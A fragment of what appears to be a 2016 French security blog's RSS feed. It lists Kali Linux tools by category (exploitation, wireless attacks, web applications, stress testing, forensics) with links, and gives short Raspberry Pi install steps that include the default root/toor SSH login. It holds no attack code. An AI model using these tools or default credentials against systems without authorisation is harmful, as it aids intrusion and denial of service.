title=&quot;exploitdb&quot;&gt;exploitdb&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/jboss-autopwn&quot; title=&quot;jboss-autopwn&quot;&gt;jboss-autopwn&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/linux-exploit-suggester&quot; title=&quot;Linux Exploit Suggester&quot;&gt;Linux Exploit Suggester&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/maltego-teeth&quot; title=&quot;Maltego Teeth&quot;&gt;Maltego Teeth&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/metasploit-framework&quot; title=&quot;Metasploit Framework&quot;&gt;Metasploit Framework&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/msfpc&quot; title=&quot;MSFPC&quot;&gt;MSFPC&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/routersploit&quot; title=&quot;RouterSploit&quot;&gt;RouterSploit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/set&quot; title=&quot;SET&quot;&gt;SET&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/shellnoob&quot; title=&quot;ShellNoob&quot;&gt;ShellNoob&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlmap&quot; title=&quot;sqlmap&quot;&gt;sqlmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/thc-ipv6&quot; title=&quot;THC-IPV6&quot;&gt;THC-IPV6&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/yersinia&quot; title=&quot;Yersinia&quot;&gt;Yersinia&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;

		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;vc_col-sm-3 wpb_column vc_column_container&quot;&gt;&lt;div class=&quot;vc_column-inner&quot;&gt;&lt;div class=&quot;wpb_wrapper&quot;&gt;
	&lt;div class=&quot;wpb_text_column &quot;&gt;
		&lt;div class=&quot;wpb_wrapper&quot;&gt;
			&lt;h5&gt;Wireless Attacks&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airbase-ng&quot; title=&quot;Airbase-ng&quot;&gt;Airbase-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/aircrack-ng&quot; title=&quot;Aircrack-ng&quot;&gt;Aircrack-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airdecap-ng-and-airdecloak-ng&quot; title=&quot;Airdecap-ng and Airdecloak-ng&quot;&gt;Airdecap-ng and Airdecloak-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/aireplay-ng&quot; title=&quot;Aireplay-ng&quot;&gt;Aireplay-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airmon-ng&quot; title=&quot;Airmon-ng&quot;&gt;Airmon-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airodump-ng&quot; title=&quot;Airodump-ng&quot;&gt;Airodump-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airodump-ng-oui-update&quot; title=&quot;airodump-ng-oui-update&quot;&gt;airodump-ng-oui-update&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airolib-ng&quot; title=&quot;Airolib-ng&quot;&gt;Airolib-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airserv-ng&quot; title=&quot;Airserv-ng&quot;&gt;Airserv-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/airtun-ng&quot; title=&quot;Airtun-ng&quot;&gt;Airtun-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/asleap&quot; title=&quot;Asleap&quot;&gt;Asleap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/besside-ng&quot; title=&quot;Besside-ng&quot;&gt;Besside-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/bluelog&quot; title=&quot;Bluelog&quot;&gt;Bluelog&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/bluemaho&quot; title=&quot;BlueMaho&quot;&gt;BlueMaho&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/bluepot&quot; title=&quot;Bluepot&quot;&gt;Bluepot&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/blueranger&quot; title=&quot;BlueRanger&quot;&gt;BlueRanger&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/bluesnarfer&quot; title=&quot;Bluesnarfer&quot;&gt;Bluesnarfer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/bully&quot; title=&quot;Bully&quot;&gt;Bully&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/cowpatty&quot; title=&quot;coWPAtty&quot;&gt;coWPAtty&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/crackle&quot; title=&quot;crackle&quot;&gt;crackle&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/eapmd5pass&quot; title=&quot;eapmd5pass&quot;&gt;eapmd5pass&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/easside-ng&quot; title=&quot;Easside-ng&quot;&gt;Easside-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/fern-wifi-cracker&quot; title=&quot;Fern Wifi Cracker&quot;&gt;Fern Wifi Cracker&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/freeradius-wpe&quot; title=&quot;FreeRADIUS-WPE&quot;&gt;FreeRADIUS-WPE&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/ghost-phisher&quot; title=&quot;Ghost Phisher&quot;&gt;Ghost Phisher&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/giskismet&quot; title=&quot;GISKismet&quot;&gt;GISKismet&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/gqrx&quot; title=&quot;Gqrx&quot;&gt;Gqrx&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/gr-scan&quot; title=&quot;gr-scan&quot;&gt;gr-scan&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/hostapd-wpe&quot; title=&quot;hostapd-wpe&quot;&gt;hostapd-wpe&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/ivstools&quot; title=&quot;ivstools&quot;&gt;ivstools&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/kalibrate-rtl&quot; title=&quot;kalibrate-rtl&quot;&gt;kalibrate-rtl&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/killerbee&quot; title=&quot;KillerBee&quot;&gt;KillerBee&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/kismet&quot; title=&quot;Kismet&quot;&gt;Kismet&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/makeivs-ng&quot; title=&quot;makeivs-ng&quot;&gt;makeivs-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/mdk3&quot; title=&quot;mdk3&quot;&gt;mdk3&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/mfcuk&quot; title=&quot;mfcuk&quot;&gt;mfcuk&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/mfoc&quot; title=&quot;mfoc&quot;&gt;mfoc&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/mfterm&quot; title=&quot;mfterm&quot;&gt;mfterm&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/multimon-ng&quot; title=&quot;Multimon-NG&quot;&gt;Multimon-NG&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/packetforge-ng&quot; title=&quot;Packetforge-ng&quot;&gt;Packetforge-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/pixiewps&quot; title=&quot;PixieWPS&quot;&gt;PixieWPS&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/pyrit&quot; title=&quot;Pyrit&quot;&gt;Pyrit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/reaver&quot; title=&quot;Reaver&quot;&gt;Reaver&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/redfang&quot; title=&quot;redfang&quot;&gt;redfang&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/rtlsdr-scanner&quot; title=&quot;RTLSDR Scanner&quot;&gt;RTLSDR Scanner&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/spooftooph&quot; title=&quot;Spooftooph&quot;&gt;Spooftooph&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/tkiptun-ng&quot; title=&quot;Tkiptun-ng&quot;&gt;Tkiptun-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/wesside-ng&quot; title=&quot;Wesside-ng&quot;&gt;Wesside-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/wifi-honey&quot; title=&quot;Wifi Honey&quot;&gt;Wifi Honey&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/wifiphisher&quot; title=&quot;wifiphisher&quot;&gt;wifiphisher&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/wifitap&quot; title=&quot;Wifitap&quot;&gt;Wifitap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/wifite&quot; title=&quot;Wifite&quot;&gt;Wifite&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/wpaclean&quot; title=&quot;wpaclean&quot;&gt;wpaclean&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;
&lt;h5&gt;Forensics Tools&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/binwalk&quot; title=&quot;Binwalk&quot;&gt;Binwalk&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/bulk-extractor&quot; title=&quot;bulk-extractor&quot;&gt;bulk-extractor&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/capstone&quot; title=&quot;Capstone&quot;&gt;Capstone&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/password-attacks/chntpw&quot; title=&quot;chntpw&quot;&gt;chntpw&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/cuckoo&quot; title=&quot;Cuckoo&quot;&gt;Cuckoo&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/dc3dd&quot; title=&quot;dc3dd&quot;&gt;dc3dd&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/ddrescue&quot; title=&quot;ddrescue&quot;&gt;ddrescue&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/dff&quot; title=&quot;DFF&quot;&gt;DFF&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/reverse-engineering/distorm3&quot; title=&quot;diStorm3&quot;&gt;diStorm3&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/dumpzilla&quot; title=&quot;Dumpzilla&quot;&gt;Dumpzilla&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/extundelete&quot; title=&quot;extundelete&quot;&gt;extundelete&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/foremost&quot; title=&quot;Foremost&quot;&gt;Foremost&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/galleta&quot; title=&quot;Galleta&quot;&gt;Galleta&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/guymager&quot; title=&quot;Guymager&quot;&gt;Guymager&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/iphone-backup-analyzer&quot; title=&quot;iPhone Backup Analyzer&quot;&gt;iPhone Backup Analyzer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/p0f&quot; title=&quot;p0f&quot;&gt;p0f&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/pdf-parser&quot; title=&quot;pdf-parser&quot;&gt;pdf-parser&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/pdfid&quot; title=&quot;pdfid&quot;&gt;pdfid&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/pdgmail&quot; title=&quot;pdgmail&quot;&gt;pdgmail&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/peepdf&quot; title=&quot;peepdf&quot;&gt;peepdf&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/regripper&quot; title=&quot;RegRipper&quot;&gt;RegRipper&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/forensics/volatility&quot; title=&quot;Volatility&quot;&gt;Volatility&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/xplico&quot; title=&quot;Xplico&quot;&gt;Xplico&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;

		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;vc_col-sm-3 wpb_column vc_column_container&quot;&gt;&lt;div class=&quot;vc_column-inner&quot;&gt;&lt;div class=&quot;wpb_wrapper&quot;&gt;
	&lt;div class=&quot;wpb_text_column &quot;&gt;
		&lt;div class=&quot;wpb_wrapper&quot;&gt;
			&lt;h5&gt;Web Applications&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/apache-users&quot; title=&quot;apache-users&quot;&gt;apache-users&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/arachni&quot; title=&quot;Arachni&quot;&gt;Arachni&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/bbqsql&quot; title=&quot;BBQSQL&quot;&gt;BBQSQL&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/blindelephant&quot; title=&quot;BlindElephant&quot;&gt;BlindElephant&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/burpsuite&quot; title=&quot;Burp Suite&quot;&gt;Burp Suite&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/cutycapt&quot; title=&quot;CutyCapt&quot;&gt;CutyCapt&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/davtest&quot; title=&quot;DAVTest&quot;&gt;DAVTest&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/deblaze&quot; title=&quot;deblaze&quot;&gt;deblaze&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/dirb&quot; title=&quot;DIRB&quot;&gt;DIRB&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/dirbuster&quot; title=&quot;DirBuster&quot;&gt;DirBuster&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/fimap&quot; title=&quot;fimap&quot;&gt;fimap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/funkload&quot; title=&quot;FunkLoad&quot;&gt;FunkLoad&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/gobuster&quot; title=&quot;Gobuster&quot;&gt;Gobuster&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/grabber&quot; title=&quot;Grabber&quot;&gt;Grabber&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/hurl&quot; title=&quot;hURL&quot;&gt;hURL&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/jboss-autopwn&quot; title=&quot;jboss-autopwn&quot;&gt;jboss-autopwn&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/joomscan&quot; title=&quot;joomscan&quot;&gt;joomscan&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/jsql&quot; title=&quot;jSQL Injection&quot;&gt;jSQL Injection&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/maltego-teeth&quot; title=&quot;Maltego Teeth&quot;&gt;Maltego Teeth&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/padbuster&quot; title=&quot;PadBuster&quot;&gt;PadBuster&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/paros&quot; title=&quot;Paros&quot;&gt;Paros&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/parsero&quot; title=&quot;Parsero&quot;&gt;Parsero&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/plecost&quot; title=&quot;plecost&quot;&gt;plecost&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/powerfuzzer&quot; title=&quot;Powerfuzzer&quot;&gt;Powerfuzzer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/proxystrike&quot; title=&quot;ProxyStrike&quot;&gt;ProxyStrike&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/recon-ng&quot; title=&quot;Recon-ng&quot;&gt;Recon-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/skipfish&quot; title=&quot;Skipfish&quot;&gt;Skipfish&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlmap&quot; title=&quot;sqlmap&quot;&gt;sqlmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlninja&quot; title=&quot;Sqlninja&quot;&gt;Sqlninja&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlsus&quot; title=&quot;sqlsus&quot;&gt;sqlsus&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/ua-tester&quot; title=&quot;ua-tester&quot;&gt;ua-tester&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/uniscan&quot; title=&quot;Uniscan&quot;&gt;Uniscan&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/vega&quot; title=&quot;Vega&quot;&gt;Vega&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/w3af&quot; title=&quot;w3af&quot;&gt;w3af&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/webscarab&quot; title=&quot;WebScarab&quot;&gt;WebScarab&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/webshag&quot; title=&quot;Webshag&quot;&gt;Webshag&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/webslayer&quot; title=&quot;WebSlayer&quot;&gt;WebSlayer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/websploit&quot; title=&quot;WebSploit&quot;&gt;WebSploit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/wfuzz&quot; title=&quot;Wfuzz&quot;&gt;Wfuzz&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/wpscan&quot; title=&quot;WPScan&quot;&gt;WPScan&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/xsser&quot; title=&quot;XSSer&quot;&gt;XSSer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/zaproxy&quot; title=&quot;zaproxy&quot;&gt;zaproxy&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;
&lt;h5&gt;Stress Testing&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/dhcpig&quot; title=&quot;DHCPig&quot;&gt;DHCPig&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/web-applications/funkload&quot; title=&quot;FunkLoad&quot;&gt;FunkLoad&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/sniffingspoofing/iaxflood&quot; title=&quot;iaxflood&quot;&gt;iaxflood&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/inundator&quot; title=&quot;Inundator&quot;&gt;Inundator&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/sniffingspoofing/inviteflood&quot; title=&quot;inviteflood&quot;&gt;inviteflood&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/ipv6-toolkit&quot; title=&quot;ipv6-toolkit&quot;&gt;ipv6-toolkit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/mdk3&quot; title=&quot;mdk3&quot;&gt;mdk3&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/reaver&quot; title=&quot;Reaver&quot;&gt;Reaver&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/rtpflood&quot; title=&quot;rtpflood&quot;&gt;rtpflood&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/slowhttptest&quot; title=&quot;SlowHTTPTest&quot;&gt;SlowHTTPTest&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/t50&quot; title=&quot;t50&quot;&gt;t50&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/termineter&quot; title=&quot;Termineter&quot;&gt;Termineter&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/thc-ipv6&quot; title=&quot;THC-IPV6&quot;&gt;THC-IPV6&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/stress-testing/thc-ssl-dos&quot; title=&quot;THC-SSL-DOS&quot;&gt;THC-SSL-DOS&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;

		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description>
		<pubDate>Sun, 11 Sep 2016 06:35:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Installer Kali Linux sur un Raspberry PI</title> 
		<link>https://www.hack4.info/index.php?article13/installer-kali-linux-sur-un-raspberry-pi</link>
		<guid>https://www.hack4.info/index.php?article13/installer-kali-linux-sur-un-raspberry-pi</guid>
		<description>&lt;p&gt;Téléchargez la version pour votre raspberry : https://www.offensive-security.com/kali-linux-arm-images/&lt;/p&gt;

&lt;p&gt;Créez l&#039;image sur la carte SD, puis allumez votre raspberry et patientez le temps de la finalisation de l&#039;installation&lt;/p&gt;

&lt;p&gt;Pour se connecter en SSH il faut utiliser l&#039;username : root et le pass : toor&lt;/p&gt;

&lt;p&gt;Mettez à jour Kali Linux avec les commandes suivantes : &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;apt-get update&lt;/li&gt;
&lt;li&gt;apt-get dist-upgrade -y&lt;/li&gt;
&lt;/ul&gt;</description>
		<pubDate>Sun, 11 Sep 2016 05:27:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
</channel>
</rss>